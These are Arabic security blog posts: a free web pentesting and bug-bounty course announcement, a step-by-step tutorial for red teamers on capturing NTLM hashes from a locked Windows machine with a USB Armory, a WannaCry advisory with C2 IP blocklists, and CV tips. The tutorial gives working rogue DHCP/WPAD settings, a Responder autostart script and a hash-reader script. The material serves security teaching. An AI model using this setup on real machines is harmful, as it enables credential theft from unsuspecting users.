كيف تتربح ماديا من خلال إكتشاف ثغرات المواقع

السلام عليكم ورحمة الله وبركاته,

منذ فترة ليست بالقصيرة, بدأنا بشرح كورس مفصل عن إختبار إختراق تطبيقات الويب باللغة العربية. الكورس شمل أساسيات كثيرة جدا مثل ال Networking, Linux, Protocols, How things works (i.e. DNS, HTTP, HTTPS) وكذلك شمل شروحات لثغرات تطبيقات الويب. إضغط هنا لتفاصيل أكثر عن الكورس.

الكورس لم ينتهي بعد ولا زلنا في مرحلة إٍستكماله. لكن قمنا بإضافة درسين مهمين جدا توجب علينا كتابتهم في مقال منفصل, وهما عن كيفية التربح ماديا من إكتشاف ثغرات المواقع.

الدرسين يشملان أشهر ال bug bounty platforms وما هي فكرة ال bug bounty وما هي الطريقة الأنسب لكتابة تقرير بالثغرة التي قمت بإكتشافها. كذلك الدروس شملت أيضا الحديث عن ال CVSS scoring system وكيف يعمل وإنتهاءا بطرق الحصول علي المكفآت المادية من منصة Hackerone.

يمكنكم مشاهدة الدروس من خلال الروابط التاليه:

رابط الدرس الأول:

رابط الدرس الثاني:

ولمتابعة ال Playlist الخاصة بالكورس كاملا, يمكنكم الوصول إليها من الرابط التالي:

https://www.youtube.com/user/Zigoo0/playlists

أما إذا كان لديكم أي أسالة أو إستفسارات بخصوص الكورس, فيمكنكم نشرها علي الجروب المنشأ خصيصا لذلك:

https://www.facebook.com/groups/328952157561088/

وبالأخير, نتمني التوفيق والنجاح للجميع إن شاء الله ولا تنسونا من صالح دعائكم.

أخوكم إبراهيم حجازي

 

إنطلاق كورس إختبار إختراق تطبيقات الويب باللغة العربية مجانا

السلام عليكم ورحمة الله وبركاته أحبتي في الله.

يسر مدونة مجتمع الحماية العربي أن تعلن عن إطلاق كورس إختبار إختراق تطبيقات الويب باللغة العربية
Web Applications Penetration Testing Course

واللذي يشرح بالتفصيل ثغرات المواقع مع أمثلة عمليه علي شركات عالمية عن كيفية حدوث الثغرات وكيف يتم إستغلالها.

تم التركيز في الكورس علي وضع أساسيات مهمه جدا لابد وأن يفهمها كل مختبر إختراق قبل البدأ في إكتشاف وإستغلال الثغرات.

ما اللذي سيتم شرحه في الكورس:

Introduction Day:
1. Course Requirements:
Installing necessary browser plugins (Wappalyzer, FlagFox, FoxyProxy)
Virtualbox + Ubuntu
Java & Burp Suite

First session (Warming Up):
Deep dive into data leaks (Haveibeenpwned.com & Shodan.io)

Part 1:
1. Linux Basics:
Introduction to Linux Structure & files permissions.
Packages & installation process
Command line examples
(man, apt-get, apt-cache, find, grep, cut, sort, curl, wget, >, >>, |, ;, head, tail, nano, touch, &, ps, df, top)
Installing LAMP stack.

2. Introduction Topics:
1- OSI Model in a Nutshell (Life of a Packet)
2- Wireshark & NetworkMiner
3- TCP/UDP/HTTP/HTTPS Protocols
3- Nmap basics
4- HTTP Methods & HTTP Response Types
5- HTTP Headers
6- Web Authentication Methods, Cookies, Sessions
7- Encryption, Encoding, Hashing
10- DNS Basics, A, MX, CNAME Records
11- PTR Records (Reverse DNS) & PassiveDNS (Yahoo or Facebook Example)
12- What happens when I open https://www.facebook.com in my browser?
13- Basic PHP examples (GET vs POST)
14. CORS, CSP & SOP

3. BurpSuite:
1- What is Burp and why we need it?
2- A Jurney into Burp Tabs
3- Burp configuration
4- Get your hands dirty using burp

Part 2:
1. Easy Web Applications Attacks:
1- HTTP Verb Tampering Attack
2- Open Redirection
3- Host Header Attacks
4- Session Fixation
5- Text Injection & HTML Injection
6- ClickJacking
5- Insecure Direct Object Reference (IDOR)
6- Hanging Fruits (Forgotten backup files and status pages)

2. Meduim Web Applications Vulnerabilities:
1. Cross Site Scripting (XSS)
1- Basics of XSS
2- Reflected, Stored & DOM based XSS
3- XSS Payloads
3- Google XSS challenges step by step
4- Your task is to write and test XSS Cookie stealer

2. Cross Site Request Forgery (CSRF)
1- CSRF Basics
2- How to find a CSRF Vulnerability
3- CSRF Exploitation

3. Subdomain Takeover

Part 3:
1. Advanced Web Applications Vulnerabilities:
1. SQL Injection
1- SQL Basics
2- SQL Injection Basics & SQL Types (Union Based, Boolean Based, Time Based)
3- Manual Union Based SQL Injection Exploitation
4- Manual Boolean Based SQL Injection Exploitation
5- Manual Time Based SQL Injection Exploitation
6- A Walk through SQLMAP
7- Exploiting SQL Injection Vulnerabilities with SQLMAP

2. Server Side Request Forgery (SSRF)
1- SSRF Basics
2- How to find SSRF Vulnerabilities
3- SSRF Exploitation Demo
4- SSRF vs XSPF

3. Remote Command Execution
1- RCE Basics
2- How to find RCE Bugs in the Source Code (Example on PHP)
3- RCE Exploitation Demo (ShellShock or else)

4. Remote Code Execution
1- RCE Basics
2- How to find RCE Bugs in the Source Code
3- RCE Exploitation Demo on Yahoo

5. Local/Remote File Inclusion

6. XXE (External Entity Injection)

7. CSTI & SSTI (Client/Server Side Template Injection)

7. Object Injection Vulnerabilities

8. File Upload Attacks
1- Bypassing file uploads security restrictions (Multiple methods)
2- Demo on Twitter.com

Part 4:
8. Real Life Demo
1. Enumerating and scanning 200.000+ Yahoo Hostname!

9. Conclusion & References

بفضل من الله عز وجل إنتهينا في الوقت الحالي من تسجيل 23 درس وتم طرحهم جميعا علي Playlist واحده يتم تحديثها بشكل اسبوعي بدروس جديدة من الكورس. يمكنكم مشاهدة الدروس من خلال الرابط التالي:

معلومات يجب أن تعرفها عن الكورس:

١- دروس الكورس يتم تحديثها وطرح دروس جديدة يوم الأحد من كل اسبوع, لذا ننصحك بالإشتراك في القناة حتي يصلك الجديد أول بأول

٢- تم إنشاء جروب علي الفيس بوك خاص بالكورس حتي يتثني لمن لديه أي سؤال او لديه صعوبة في فهم شئ ما من طرح أسالته وسيتم الإجابه عليها من قبل المختصين إن شاء الله. رابط جروب الفيس بوك:
https://www.facebook.com/groups/328952157561088/

٣- الكورس مجاني وسيظل مجاني حتي إنتهائه إن شاء الله ولا نسألكم سوي الدعاء لي ولوالدي بالرحمه والمغفرة

٤- الدروس التي تم الإنتهاء منها كانت شروحات للاساسيات التي يحتاجها أي مختبر إختراق, والدروس القادمة ان شاء الله بدأ من الأحد القادم ستكون مختصة بالويب Web فقط

٥- تحتاج أن تقرأ البوست التالي قبل أن تبدأ في الكورس لأنه يحتوي علي إجابات لإسئله كثيرة يتم سؤالها بشكل مستمر:
https://www.facebook.com/groups/328952157561088/permalink/343153629474274/

٦- تم تجهيز lab للمتدربين في الكورس حتي يتمكنوا من التطبيق العملي وحل مسابقات تمكنهم من تطوير مهاراتهم في مجال اختبار الإختراق. ال Lab الأول واللذي يخص الدروس التي تم الإنتهاء منها يمكنكم الوصول إليه من خلال الرابط التالي ويمكنكم أيضا طرح أسالتكم في نفس الرابط. هل يمكنكم حله وتخطيه؟

https://www.facebook.com/groups/328952157561088/permalink/343153629474274/

٧- ال Lab الخاص بثغرات الويب سيتم طرحه فور البدأ بشرح ثغرات ال SQL Injection ان شاء الله

وفي الأخير أود أن أشكر كل من الأشخاص التالية أسماءهم لمساهمتهم في أن يخرج الكورس بهذا الشكل ومساهمتهم في الإجابة علي أسالة المتدربين بشكل مستمر:

محمود علام

محمد عبدالعاطي

أحمد أبوالعلا

اسامه النجار

راجين من الله عز وجل أن نكون عند حسن ظنكم بنا.

سرقة الصلاحيات من جهاز ويندوز مغلق باستخدام USB Armory

USB Armory

موضوعنا اليوم هو موضوع جميل ومهم جدا لل pentester و ال red teamer ويصنف تحت ال Physical Social Engineering Attack. اليوم سنتعلم كيفية سرقة ال NTLM hashes من جهاز ويندوز حتى لو كان الجهاز في Locked باستخدام USB Armory device.

نستفيد من هاشات ال NTLM في سيناريوهات كثيرة منها على سبيل الذكر لا الحصر

  • الدخول على ال Shared folders
  • أو في هجمات ال PTH على الجهاز أو على الخوادم التي قد يدخلها المستخدم من جهازه المستهدف
  • تنفيذ أوامر عن بعد على الجهاز المستهدف باستخدام psexec
  • محاول كسر الهاش و الحصول على كلمة المرور الحقيقة باستخدام أداة hashcat (قد تستغرق وقت طويل جدا)
  • إلخ

الجدير بالذكر هنا أنه لن تعيقنا أي Group policy  تمنع استخدام ال USB storage لان الكمبوتر المستهدف سيتعرف عليه على أنه USB Ethernet device.

ما هو جهاز USB Armory ؟

ببساطة, هو عبارة عن جهاز كومبيوتر بحجم Flash drive. تستطيع أن تثبت عليه نظام تشغيل وتتعامل معه بكامل خصائص نظام التشغيل. مكونات USB Armory المادية أو ال Hardware مفتوحة المصدر, بمعنى أنك تستطيع أن تطلع على تفاصيل تصميم الجهاز والتغيير في مكوناته كما تشاء.
قامت شركة InversePath والتي تم الاستحواذ عليها من شركة F-Secure والمتخصصة في عمل أجهزة بنية تحتية آمنة.
سعر الجهاز هو 155 دولار أمريكي

يحتوي جهاز USB armory على microSDcard كوحدة تخزين وهنا قائمة بال microSD cards المدعومة رسمية ولكنها لا تنحصر في هذه القائمة. فكل ال microSDcard الحديثة مدعومة ولكن يفضل أن تكون ذات سرعة عالية في القراءة والكتابة. أشهر الأنواع المدعومة والمتوفرة في جميع الدول العربية هي SanDisk لكن بشرط أن تكون Ultra. وحدة التخزين هذه هي التي تحتوي على نظام التشغيل والذي سنغطي اليوم طريقة تحميل و تثبيت و إعداد النظام عليها.

الخطوة الأولى:/ تحميل نظام التشغيل وتثبيته

في البداية نذهب إلى صفحة انظمة التشغيل المدعومة رسميا من هنا. كما أحبذ أن نستخدم نسخة USB armory base images. قد يستغرب عدم اختيارالنسخة ال Kali لكن بعد بحث وجدت أن نسخة الكالي يشتكي بعض الناس منها ووجود بعض ال Bugs في منصة ARM لهذا. كما أن النسخة التي اخترتها هي نفس ما تستخدمه الكالي تماما ولا شي مختلف على الإطلاق بل بالعكس تأتي النسخة مجردة تماما من جميع البرامج مما يجعلها صغيرة الحجم وسريعة.

الأن نذهب إلى الرابط تحميل النظام ونحمل أخر image موجودة. حاليا النسخة (usbarmory-debian_jessie-base_image-20170518.raw.zip) هي الأحدث حتى تاريخ كتابة هذا المقال.

1. تحميل النظام

wget -c https://github.com/inversepath/usbarmory-debian-base_image/releases/download/20170518/usbarmory-debian_jessie-base_image-20170518.raw.zip

نتأكد من أن أننا حملنا النسخة بشكل سليم

sha256sum usbarmory-debian_jessie-base_image-20170518.raw.zip

يجب أن تكون المخرجات كما في الصفحة التحميل الرسمية.

نفك ضغط النظام
unzip usbarmory-debian_jessie-base_image-20170518.raw.zip

ينتج عنه ملف
usbarmory-debian_jessie-base_image-20170518.raw

2. معرفة مكان أو تسمية ال microSD card في الجهاز

الآن دخل ال micro SD card في جهازك, جهاز الكمبيوتر الخاص بك وليس ال USB armory. ثم اعرض جميع وحدات التخزين الموجودة في جهازك
fdisk -l

في حالة جهازي كان تسمية ال SD cards هي /dev/sdc وقد تخلف التسمية عنده. كن حذر جدا هنا لأن في مرحلة الثبيت لو اخترت وحدة تخزين خاطئة ستقوم بمسح كل ما على تلك وحدة ووضع نظام التشغيل عليها! لهذا وجب التنبيه

 

3. تثبيت النظام على ال microSD card

بصلاحيات ال root نفذ الأمر التالي: (انبته لمسار وحدة التخزين هنا)
dd if=usbarmory-debian_jessie-base_image-20170518.raw of=/dev/sdc bs=1M conv=fsync

تستغرق هذه العملية لتكتمل ما بين 3 إلى 4 دقائق. لاحظ أننا استخدمنا /dev/sdc وليس /dev/sdc1

الأن أخرج ال microSD card من جهازك وركبه في الـ USB armory. أنصحك بالتعامل مع ال USB armory برفق لأن أجزاءه حساسة وخفيفة جدا.
وصل ال USB armory في جهازك في أي منفذ من منافذ ال USB الخاصة بكمبيوترك وانتظر 20 ثانية حتى يعمل نظام التشغيل بشكل كامل. ستلاحظ خلالها أنها تنير وتنطفئ بشكل مستمر. بعد انتظارك نفذ الأمر
ifconfig

سترى كرت شبكة جديد يأخذ IP محدد تلقائيا وهو 10.0.0.2

الخطوة الثانية:/ إعداد نظام التشغيل

لأننا نشارك الإنترنت مع نظام ال USB Armory يجب أن نجعل نظام التشغل الأساسي يعمل كـ Gateway بالخطوات التالية
1. اسمح بتمرير ال packets

echo 1 > /proc/sys/net/ipv4/ip_forward

2. إضافة iptables rules وتفعيل ال masqurade

iptables -I FORWARD -j ACCEPT
iptables -t nat -I POSTROUTING -o wls1 -j MASQUERADE

حيث wls1 هو كرت الشبكة المتصل بالإنترنت

الآن ادخل إلى الUSB armory عن طريق ال SSH على العنوان 10.0.0.1 وهذه العناوين ستكون ثابته دائما
ssh [email protected]

كلمة المرور الافتراضية هي: usbarmory

نبدأ إعداد النظام

1. تحديث المخازن والنظام

المخازن الافتراضية التي تأتي مع التوزيع ليست كافية وبها إصدارات قديمة وبرامج أقل لهذا سنقوم بعمل تحديث مرتين. مرة بالمخازن الافتراضية والثانية بالمخازن التي نريدها
تكأد أنك تصل إلى الانترنت من ال USB Armory ثم ابد بالتحديث
apt update && apt upgrade

ثبت البرامج التالية
apt install wget apt-transport-https dirmngr

الأن اذهب إلى الموقع التالي https://debgen.simplylinux.ch ثم اختر Stable واضغط Generate. سيظهر لك المخازن المطلوبة. نسخها في المسار /etc/apt/sources.list
ضع علامة # أمام المخازن القديمة لتجاهلها.
الأن نفذ الأمر التالي مرة أخرى
apt update && apt upgrade

2. تثبيت البرامج المطلوبة

ثبت البرامج التالية
apt -y install curl git screen sqlite3 build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev autoconf postgresql pgadmin3 zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev inotify-tools

apt install -y ruby ruby-dev
gem install sqlite3

apt install -y python python-pip python-dev
pip install pycrypto

 

3. إعداد ال DHCPd

خذ نسخة احتياطية من الملف
cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.orig

واجعل محتويات الملف الأصلي كالتالي

#
# Sample configuration file for ISC dhcpd for Debian
#

# have support for DDNS.
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "attacker.zone";
option domain-name-servers 10.0.0.1;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wpad - Web Proxy Auto-Discovery Protocol
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.2 10.0.0.3;
default-lease-time 60;
max-lease-time 72;
option routers 10.0.0.1;
option local-proxy-config "http://10.0.0.1/wpad.dat";
}

 

4. تحميل برنامج Responder

برنامج Responder هو واحد من أشهر البرامج حاليا في عمل خادم وهمي للكثير من الخدمات مثل HTTP/SMB/MSSQL/FTP/LDAP والتي تفيد في حقن الاتصال داخل الشبكة ويستخدم كثيرا في هجمات ال MiTM.
mkdir /pentest && cd /pentest
git clone https://github.com/spiderlabs/responder
chmod +x Responder.py

لاحظ في في إعدادات ال dhcp server أضفنا تحت WPAD أو Web Proxy Auto-Discovery Protocol وهو رابط إعدادات البروكسي والتي سيجبر فيه الجهاز المستخدم أن يذهب إلى هذا الرابط ويحملها ليقوم باكتشاف البروكس (بروكسي وهمي عن طريق برنامج Responder) قبل تصفحه أي موقع.

تشغيل البرامج تلقائيا عند بدء النظام

كل ما نريده هنا أن نجعل ال USB armory أن تشغل تلقائيا ال DHCP وبرنامج Responder بمجرد أنا يعمل النظام.

#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

# Generate ssh host keys if missing
FILES=$(ls /etc/ssh/ssh_host_* 2> /dev/null | wc -l)
if [ "$FILES" = "0" ]; then
while [ $(cat /proc/sys/kernel/random/entropy_avail) -lt 256 ]; do
sleep 1;
done
/usr/sbin/dpkg-reconfigure openssh-server
fi

# Start DHCP server
if ! pgrep -x "dhcpd" > /dev/null
then
echo "Starting DHCPd" >> /root/rc.log
echo '' > /var/lib/dhcp/dhcpd.leases
/usr/sbin/dhcpd
fi

# Start Responder
echo "Staring Responder" >> /root/rc.log
/usr/bin/screen -dmS responder bash -c 'cd /pentest/responder/; python Responder.py -I usb0 -f -w -r -d -F'

echo "Staring cred watch" >> /root/rc.log
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/responder/Responder.db; do shutdown -h now; done'

exit 0

 

الخطوة:الثالثة:/ تنفيذ الهجوم واستعادة البيانات والاستفادة منها(اختراق الجهاز المستخدم)

الأن لم يبقى سوى توصيل USB Armory في الجهاز المستهدف والانتظار حتى يعمي ثم تنطفئ الإنارة تماما.

بعد اكتمال الهجوم وأخذ جهازنا, نستطيع أن نوصل ال USB Armory في الكومبيوتر الخاص بنا والحصول على الهاشات والصلاحيات التي تم جمعها

يتم تخزين الصلاحيات في مكانين
أولها قاعدة بيانات
/pentest/responder/Responder.db

ثانيها
/pentest/responder/logs/(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt

وأفضل الملف الأول Responder.db لأنه يخزن جميع أنواع البيانات المسروقة ولا يحتاج منك البحث في أكثر من ملف مثل المسار الثاني.

قمت بعمل سكريبت صغير يقرأ قاعدة البيانات بشكل مرتب و سهل

#!/usr/bin/env ruby 
# KING SABRI | @KINGSABRI
# Responder database reader 
#
require "sqlite3"

if ARGV.size == 1 
  responder_db = ARGV[0]
else
  puts "Respnder.db path required!\nUsage: ruby responder-reader.rb /path/responder/Responder.db"
  exit 
end 

# Open
db = SQLite3::Database.new responder_db
records = db.execute "SELECT * FROM responder;"
records.each do |record|
 puts "Timestamp:  #{record[0]}"
 puts "Module:     #{record[1]}"
 puts "HashType:   #{record[2]}"
 puts "IPaddress:  #{record[3]}"
 puts "Hostname:   #{record[5].split('\\')[0]}"
 puts "Username:   #{record[5].split('\\')[1]}"
 puts "Cleartext:  #{record[6]}"
 puts "Hash:       #{record[7]}"
 puts "Full Hash:  #{record[8]}"
 puts 
end 
puts "[+] Number of records: #{records.size}"

 

ويستخدم بهذه الطريقة
ruby responder-reader.rb /pentest/responder/Responder.db

النتيجة

Timestamp: 2017-06-21 06:23:10
Module: HTTP
HashType: NTLMv2
IPaddress: 10.0.0.2
Hostname: DESKTOP-9INJ6LJ
Username: KING
Cleartext:
Hash: 8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
Full Hash: KING::DESKTOP-9INJ6LJ:1122334455667788:8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
[+] Number of records: 1

 

فيديو يوضح نتيجة الهجوم

 

بالإضافة إلى ما تم ذكره من سرقة ال NTLM hashes والجهاز وسطح المكتب مغلق, سيعمل الهجوب على إنشاء بروكسي وهمي (تذكر إعدادت ال DHCP و WPAD) ويجبر النظام على استخدامه فلو دخل المستخدم إلي جهازه وحاول تصفح الأنترنت ستظهر له شاشة تطلب إدخال اسم المستخدم كلمة المرور (غالبا ما سيدخل المستخدم كلمة المستخدم وكلمة المرور) وستخزن أيضا في قاعدة البيانات على شكل NTLM.

 

في النهاية أحب أن أنوه على أن استخدامات الـ USB Armory لا تنحصر في ما تطرقنا إليه فقط.

 

المصادر

فيروس الفدية WannaCry وكيف تنقذ مؤسستك منه قبل فوات الأوان.

 

السلام عليكم إخواني الكرام,

انتشر وبشدة فيروس WannaCry منذ البارحه كالنار في الهشيم وأصاب اكثر من 40000 الف جهاز كمبيوتر في حوالي 74 دولة حول العالم ما بين مؤسسات حكومية و ما يقرب من 16 مستشفي في إنجلترا ومن المؤسف تعليق أحد الدكاترة بأحد المستشفيات التي اصيبت انظمتها بهذا الفيروس علي موقع الجارديان قائلا بأن جميع العمليات توقفت في المستشفي منذ الواحده مساء وتم حذف جميع سجلات المرضي ونتائج الفحص وأن حياة أشخاص كثيرون علي المحك بسب هذه الكارثه وبالتأكيد سيكون هناك موتي جراء إنتشار هذا الفيروس!!!

مرورا بأكبر شركة اتصالات في إسبانيا وغيرها من الأهداف التي اصيبت بهذا الفيروس حتي ان وزارة الداخلية الروسية لم تسلم. لذا قررنا علي وجه السرعة كتابة مقال يتلخص في جزأين. ما اللذي نعرفه عن الفيروس وماذا يتوجب عليك فعله لتحمي مؤسستك او شركتك التي تعمل بها قبل فوات الأوان.

ما اللذي نعرفه عن الفيروس حتي الآن:

1- الفيروس مثله كمثل اي فيروس فديه أخر يقوم بتشفير ملفات جهازك ويطلب منك مبلغ 300 دولار حتي يمكنك استرجاع ملفاتك مره اخري

2- هذا الفيروس يقوم بالإنتشار من خلال رسائل تصيد Phishing EMails يتم ارسالها لملايين الإميلات بشكل عشوائي ويحتوي الإميل المرسل علي ملف مرفق عندما يتم فتحه يقوم بتنزل فيروس الفديةWannaCry

3- من الطرق التي يستخدمها الفيروس أيضا هي عملية الفحص العشوائي للعناوين IP Addresses فيقوم بانشاء ايبي عشوائي ومن ثم فحص اذا ما كان port 445 مفتوح علي هذا الايبي ام لا وهو البورت المستخدم بواسطة خدمة مشاركة الملفات SMB فاذا وجد ايبي مفتوح فيه هذا البورت يقوم بفحص جميع الايبيهات التي علي نفس الشبكه ويحاول استغلال ثغرة MS17-010 عليهم جميعا.

4- بعد ان يقوم الفيروس بالنزول علي جهاز الضحيه واصابته يقوم مباشرة بفحص كل الايبيهات الموجوده علي الشبكه باحثا عن اي جهاز يستخدم port 445 الخاص بخدمة مشاركة الملفات SMB Service

5- اذا وجد اي جهاز علي الشبكه يستخدم خدمة مشاركة الملفات فانه يقوم بإستغلال الثغرة الخطيرة التي تم الاعلان عنها عقب تسريبها من فريق الأمن القومي الأمريكي NSA بواسطة فريق ShadowBrokers والثغره معروفه باسم MS17-010 وهي ثغره تصيب كل أنظمة الوندوز وتمكن المخترق من إختراق اي جهاز تعمل عليه خدمة مشاركة الملفات SMB

6- ولان خدمة مشاركة الملفات منتشره في كل الشركات وحتي اغلب الشبكات الخاصه فبهذه الطريقه انتشر الفيروس كالنار في الهشيم في اكثر من اربعه وسبعين دوله حول العالم في وقت قياسي

7- من بين الدول المصابه بالفيروس هي ألمانيا, روسيا, إنجلترا, أسبانيا, أمريكا, الأرجنتين وغيرها من الدول العربية أيضا التي لم تسلم من ذلك الفيروس

8- وللاسف تم الإبلاغ عن انتشار موسع للفيروس داخل 16 مستشفي في إنجلترا وتعطل انظمة تلك المستشفيات بسبب أن الفيروس قام بتشفير سجلات المرضي ولا يمكنهم استقبال اي حالات جديدة 🙁

ما اللذي يتوجب عليك فعله:

١- قم فوراا بعمل تحديث لجميع أنظمة الوندوز داخل شركتك لتتأكد من ترقيع ثغرة MS17-010 والتي هي السبب الرئيسي في عملية الإختراق وانتشار الفيروس

اذا كان لاي سبب لديك مشكله في تحديث الوندوز فيمكنك استخدام تلك الأداه التي نشرتها شركة Symantec وتشغيلها بصلاحية administrator علي جهازك وسيقوم بعدها جهازك بإعادة التشغيل وتكون الثغره قد تم ترقيعها في جهازك

اما للشركات والبنوك وغيرها من المؤسسات فننصح بشده بعمل تحديث لجميع اجهزة وسرفرات الشركة مباشرة.

٢- تأكد من أن جميع أجهزة شركتك منصب عليها برنامج مضاد فيروسات وعليه جميع التحديثات لتضمن بأن بيانات هذا الفيروس file signatures موجوده في مضاد الفيروسات الخاص بك ليقوم بايقاف اي محاوله من الفيروس الدخول الي اجهزة الشركه

٣- اذا كان لدي شركتك اي سرفرات متصلة بالانترنت فتأكد من ان port 445 و port 139 لا يمكن الوصول اليهم من خارج شكبتك او من خلال الانترنت بصورة عامة

٤- المخترقين يقومون باستخدام الايبيهات التاليه للتحكم في الفيروس او في الاجهزه المخترقه لذا ننصح وبشدة أن تقوم بالبحث داخل ال SIEM Solution الخاص بشركتك عن اي سجلات logs لها علاقه بهذه الايبيهات واذا لم يكن لدي شركتك SIEM Solution فيمكنك البحث في السجلات الخاصه بال Proxy او DNS Logs
الخاصه بشركتك عن تلك الايبيهات للتأكد من ان أجهزة شركتك لم يصيبها هذا الفيروس

213.61.66.116
171.25.193.9
163.172.35.247
128.31.0.39
185.97.32.18
178.62.173.203
136.243.176.148
217.172.190.251
94.23.173.93
50.7.151.47
83.162.202.182
163.172.185.132
163.172.153.12
62.138.7.231
188.166.23.127
193.23.244.244
2.3.69.209
146.0.32.144
50.7.161.218
217.79.179.77
212.47.232.237
81.30.158.223
79.172.193.32
89.45.235.21
38.229.72.16
188.138.33.220

كما ننصح أيضا بإضافة هذه القائمة من الأيبيهات الي ال IPS الخاص بشركتك او وضعهم علي قائمة الحظر.

٥- قم بإرسال بريد إلكتروني لموظفين شركتك توضح لهم فيها أن لا يقوموا بفتح اي بريد الكتروني به مرفقات مطلقااا الا اذا كانوا متأكدين من مصدر الرساله وهو شخص موثوق مائه بالمائه.

٦- بالطبع يتوجب عليك نسخ ملفاتك المهمه بشكل دائم حتي تتفادي مثل هذا النوع من الفيروسات ويمكنك استرجاع ملفاتك في اي وقت.

٧- هذه القائمة تحتوي جميع الهاشات الخاصه بملفات الفيروس ويمكنك ايضا استعمالها للتأكد من سلامة انظمة واجهزة شركتك من هذا الفيروس كالبحث بها علي اي Endpoint monitoring solutions خاص بشركتك:
https://gist.github.com/Blevene/42bed05ecb51c1ca0edf846c0153974a

مراجع هامة يمكن قرآئتها:

http://blog.talosintelligence.com/2017/05/wannacry.html

https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100

 

The worm that spreads WanaCrypt0r

كيف تكتب الـ CV الخاص بك في مجال تكنولوجيا المعلومات

banner_formazione

السلام عليكم ورحمة الله وبركاته,

واجهتني مشاكل كثيرة في بداية حياتي العملية بسبب كتابة ال CV ولم أملك الخبرة الكافية وقتها لكتابته بشكل احترافي, أما وبعد سنوات من الأسئلة والتجربة والتعديلات, أحببت أن اشارك معكم الطريقه الأفضل لكتابة ال CV الخاص بك في مجال تكنولوجيا المعلومات بشكل عام سواء كنت مبرمج او مختبر اختراق او مكتشف ثغرات او مهندس شبكات إلي آخره.

سأقوم إن شاء الله في نهاية المقال بإرفاق نسخة معدة مسبقا ويمكنكم التعديل عليها وإستخدامها لكتابة سيرتكم الذاتية.

مقدمة سريعة:

كما نعلم جميعا أن الـ CV الخاص بك هو عباره عن انعكاس لك, بمعني انه هو الذي يتحدث نيابة عنك ويوضح ما اللذي تعرفة وماذا عملت مسبقا لذا ما يحتويه الـ CV الخاص بك لابد ان يظهر مهاراتك ونجاحاتك بشكل إحترافي.

الـ CV يجب أن ينقسم لعدة أجزاء كل جزأ يوضح نقطه معينة, لذا سأبدا بتحديد النقاط فيما يلي مع مراعاة ان هذا هو الترتيب المناسب والذي أستخدمه شخصيا في كتابة سيرتي الذاتية.

 

١- معلومات عنك

بداية الـ CV الخاص بك يجب ان يحتوي علي معلومات لتعريف الشركة بك, مثل اسمك, بريدك الإلكتروني الذي سيتم مراسلتك من خلاله, رابط لموقعك اذا كان لديك موقع خاص بك حتي يمكنهم الإطلاع علي المقالات التي تقوم بكتابتها او عن اخر اكتشافاتك وبالطبع رابط لحسابك علي موقع LinkedIn الشهير فهو بمثابة سيرتك الذاتية, مثال:

Name: Ebrahim Hegazy
Email: [email protected]
Website: http://www.security4arabs.com
LinkedIn: https://www.linkedin.com/hegazy

لا تكتب: 

لا تقم أبدا بكتابة تفاصيل خاصة عن حياتك داخل الـ CV فقد رأيت الكثير من الناس يقوم بكتابة اسمه بالكامل وعنوان بيته وحالته الإجتماعية وموقفه التجنيدي والمزيد المزيد!! لا داعي مطلقا لكتابة مثل هذه البيانات فهي لن تفيد في أي شئ للوظيفة ولو احتاج صاحب العمل ان يعرف عنوانك او حالتك الاجتماعية فإنه سيقوم بمراسلتك علي البريد الذي قمت بكتابته.

ملحوظة: هناك بعض الوظائف تتطلب ان يكون رقم هاتفك مكتوب في السيرة الذاتية لذا القرار لك أن تكتبه او لا فليست كل الوظائف تتطلب ذلك.

٢- من أنت (Profile)

هذا القسم يشرح طبيعة عملك لمن يقرأ الـ CV, ليس هناك مسؤل توظيف يفهم كل الوظائف, فأنت مثلا لو قرأت سي في خاص بأحد العاملين في مجال الكيماويات هل ستفهم منه شئ؟ بالطبع لا, لذا لابد أن تكتب في بداية الـ CV الخاص بك ما يوضح طبيعة عملك حتي يستطيع مسؤل التوظيف فهم ما تفعله تحديدا بدون استخدام مصطلحات معقدة خاصه بمجالك, مثال:

Profile

Ebrahim is a security researcher specialized in finding web applications vulnerabilities, He has over 3 years of experience in information security field that varies from Web Application Security, Incident handling and Network Security with a good knowledge of Web Applications Development

ما كتبته هو مثال بسيط (لا يعبر عني) يوضح طبيعة عملك إذا كنت مكتشف ثغرات مثلا او تعمل بمجال أمن المعلومات بشكل عام.

٣- نجاحاتك (Achievements)

هذا القسم هام جدا جدا وهو عامل الإنبهار الذي سيميز سيرتك الذاتية عن باقي المئات من السير الذاتية المقدمة للشركة, فهو يحتوي علي أهم النجاحات التي قمت بها خلال فترة عملك او حتي خلال فترة دراستك بالجامعة, فمثلا لو كنت تعمل مبرمجا فسيكون هذا القسم مثلا بالشكل التالي:

Achievements
Won the second place with my team in ACM competition X
Ranked as 45 in CodeForces website after solving complex programing problems
Achieved a certificate of appreciation from my University for building their internal Application/database system
etc etc etc

ولو كنت تعمل بمجال إكتشاف ثغرات المواقع فسيكون هذا القسم بالشكل التالي مثلا:

Achievements
Rewarded and acknowledged by Facebook, Yahoo, Google for finding critical vulnerabilities in their systems
